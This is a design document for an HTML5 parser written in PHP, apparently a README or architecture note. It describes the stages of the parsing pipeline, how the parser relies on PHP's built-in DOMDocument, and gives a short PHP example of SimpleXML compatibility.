# The Parser Model

The parser model here follows the model in section
[8.2.1](http://www.w3.org/TR/2012/CR-html5-20121217/syntax.html#parsing)
of the HTML5 specification, though we do not assume a networking layer.

    [ InputStream ]    // Generic support for reading input.
           ||
      [ Scanner ]      // Breaks down the stream into characters.
           ||
     [ Tokenizer ]     // Groups characters into syntactic units.
           ||
    [ Tree Builder ]   // Organizes units into a tree of objects.
           ||
    [ DOM Document ]   // The final state of the parsed document.

## InputStream

This is an interface with at least two concrete implementations:

- StringInputStream: Reads an HTML5 string.
- FileInputStream: Reads an HTML5 file.

## Scanner

This is a mechanical piece of the parser.

## Tokenizer

This follows section 8.4 of the HTML5 spec. It is (roughly) a recursive
descent parser, though there are plenty of optimizations that are less
than purely functional.

## EventHandler and DOMTree

EventHandler is the interface for tree builders. Since not all
implementations will necessarily build trees, we've chosen a more generic
name.

The event handler receives tokens as they are emitted during tokenization.

The DOMTree is an event handler that builds a DOM tree. The output of the
DOMTree builder is a DOMDocument.

## DOMDocument

PHP has a built-in DOMDocument class (technically, it's part of libxml).
We use that, which makes the output of this process compatible with
SimpleXML, QueryPath, and many other XML/HTML processing tools.

For cases where the HTML5 is a fragment of an HTML5 document, a
DOMDocumentFragment is returned instead. This is another built-in class.
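
As a rough illustration of the compatibility point above, the following sketch uses only PHP's built-in DOM and SimpleXML extensions. The document is built by hand as a stand-in for the tree builder's output (an assumption for illustration; this parser's own API is not shown), and variable names such as `$text` and `$fragment` are hypothetical.

```php
<?php
// Stand-in for the parser's output: a hand-built DOMDocument.
// Assumption: the tree builder would hand back an equivalent object.
$doc  = new DOMDocument('1.0', 'UTF-8');
$html = $doc->createElement('html');
$body = $doc->createElement('body');
$p    = $doc->createElement('p', 'Hello');
$p->setAttribute('class', 'greeting');
$body->appendChild($p);
$html->appendChild($body);
$doc->appendChild($html);

// Because the result is a plain DOMDocument, SimpleXML can wrap it
// directly. simplexml_import_dom() returns the root element (<html>).
$sx    = simplexml_import_dom($doc);
$text  = (string) $sx->body->p;          // text content of <p>
$class = (string) $sx->body->p['class']; // attribute value of <p>

// The fragment case: a DOMDocumentFragment holds nodes that have no
// surrounding document structure.
$fragment = $doc->createDocumentFragment();
$fragment->appendChild($doc->createElement('em', 'partial'));
```

Here `$text` holds `Hello` and `$class` holds `greeting`. Other tools that accept a DOMDocument or DOMNode should be usable in the same way, without a conversion step.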